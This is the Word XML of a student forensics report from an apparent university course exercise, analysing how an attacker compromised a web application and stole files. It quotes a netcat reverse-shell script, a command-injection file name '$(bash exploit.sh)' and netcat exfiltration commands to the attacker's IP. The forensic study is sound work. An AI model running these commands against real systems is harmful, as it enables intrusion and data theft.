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0.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.foot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tbl>
      <w:tblGrid>
        <w:gridCol w:w="1519"/>
        <w:gridCol w:w="8355"/>
      </w:tblGrid>
      <w:tblPr>
        <w:tblBorders>
          <w:left w:val="single"/>
          <w:right w:val="single"/>
          <w:top w:val="single"/>
          <w:bottom w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1519" w:type="dxa"/>
            <w:shd w:fill="ffffff"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="ffffff"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="_Normal"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
              <w:shd w:fill="ffffff"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="634365" cy="749935"/>
                  <wp:docPr id="16" name="rId2.jpg"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="16" name="rId2.jpg"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="634365" cy="749935"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8355" w:type="dxa"/>
            <w:shd w:fill="ffffff"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="ffffff"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="_Normal"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
              <w:shd w:fill="ffffff"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:t xml:space="preserve">INSTITUTO SUPERIOR TÉCNICO</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="_Normal"/>
              <w:shd w:fill="ffffff"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:t xml:space="preserve">Departamento de Engenharia Informática</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="_Normal"/>
              <w:shd w:fill="ffffff"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:t xml:space="preserve">Forensics Cyber Security</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="_Normal"/>
              <w:shd w:fill="ffffff"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:t xml:space="preserve">MEIC / METI 2020-2021 – 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:t xml:space="preserve">st</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:shd w:fill="ffffff"/>
              </w:rPr>
              <w:t xml:space="preserve"> Semester</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="_Normal"/>
              <w:shd w:fill="ffffff"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Digital Forensics Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Jorge Brown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuno Palma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rodrigo Carvalho</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 1"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Do you find solid evidence that the web application has been exploited?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="ffffff"/>
        </w:rPr>
        <w:t xml:space="preserve">To see if the web application had been exploited, we first looked at its dependencies to find some possible vulnerabilities. We found out that the package “pdfinfojs” had a vulnerability where OS command injection was possible. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="ffffff"/>
        </w:rPr>
        <w:t xml:space="preserve">The next step was to find where this package was being used and we determined that it was being used in the “src/routes/cv-upload.js” file. The use of the package is done when someone does a HTTP POST request to the /cvupload endpoint. Know this, using Wireshark, we analyzed the provided network traces in search of HTTP requests of this type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
          <w:shd w:fill="ffffff"/>
        </w:rPr>
        <w:t xml:space="preserve">We found two requests done to this endpoint. They both came from the same source address 174.176.50.10 and they were the upload of two different files. Initially a script file named “exploit.sh” was uploaded which had the following content:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ar-SA"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:color w:val="345a8a"/>
        </w:rPr>
        <w:t xml:space="preserve">nc.traditional -e  /bin/bash 174.176.50.10 8888</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	What it does is run netcat, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">a simple unix utility which reads and writes data across network connections, to </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">establish a connection to the host 174.176.50.10 on port 8888 and run /bin/bash. It then takes the hosts TCP requests’ payloads as standard input and sends its standard output back to the host via a TPC response. This essentially gives remote shell access to the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	The other file that was uploaded was named “$(bash exploit.sh)” and it is a blank PDF file which sole purpose is to exploit the vulnerability present in the “pdfinfojs” package. This file exploits it because the package will run the following command on a shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pdfinfo $(bash exploit.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	What this command does is execute pdfinfo with the result of “bash exploit.sh” as an argument, but this runs the “exploit.sh” script. Now the web server has had a weakness exploited and is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblGrid>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tblPr>
        <w:tblBorders>
          <w:left w:val="single"/>
          <w:right w:val="single"/>
          <w:top w:val="single"/>
          <w:bottom w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="000000" w:sz="2"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="000000" w:sz="2"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">src/routes/cv-upload.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">52941fb04e40b41cefe2ff7c2338a7fb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">exploit.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">d6ac4abceb1bf38dad9a4dc76b6d4e9a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">$(bash exploit.sh)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">c94e45783ece1b59c775c471915698c9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 1"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Do you find any evidence of transfers involving the documents in the analyzed network traces? What can you tell about the authenticity of the documents that appeared on PharmaLeaks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	Now that we know that the web server is compromised we looked for TCP conversations with the attacker’s IP as source and the web server’s IP as destination in the network trace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	From here we found the commands sent by the attacker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nmap 192.168.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">telnet 192.168.55.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">penelope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">penelope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">penelope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">penelope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ls -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nc -q 0 174.176.50.10 23 &lt; xfarma-ceo-email.eml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nc -q 0 174.176.50.10 23 &lt; cv.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ls -a .ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ssh penelope@192.168.54.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ls -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nc -q 0 174.176.50.10 23 &lt; report.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">logout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">From here we can see that the attacker first scouted the network using nmap and found a telnet port in the machine with the 192.168.55.10 IP address. Telnet is a network protocol used to virtually access a computer and to provide a two-way text-based communication channel between two machines. This allowed the attacker remote access to Penelope’s computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	The next commands are login attempts and he succeeds with the user:password combination penelope:penelope. He then uses netcat to send the contents of “xfarma-ceo-email.eml” and “cv.pdf” to himself on port 23.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	The attacker then looks for signs of previous use of SSH(Secure Shell) in order to find the required credentials to connect to the server where the confidential files are stored. He sees that there have been previous uses of SSH from Penelope’s machine and so he connects via SSH to the file server on address 192.168.54.10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	From here he uses netcat to send the file “report.zip” to himself and then logs out of all the SSH and telnet sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	Now that the attacker’s commands were analyzed we went back to the network trace to find evidence of the transfer of these files. The files were indeed found and their MD5’s are below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblGrid>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tblPr>
        <w:tblBorders>
          <w:left w:val="single"/>
          <w:right w:val="single"/>
          <w:top w:val="single"/>
          <w:bottom w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="000000" w:sz="2"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="000000" w:sz="2"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">xfarma-ceo-email.eml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">ecd9068d354cb2c7292b4dd77d8cde83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">cv.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">c67bc5270a72a73e84235d5cbc95c472</w:t>
            </w:r>
          </w:p>
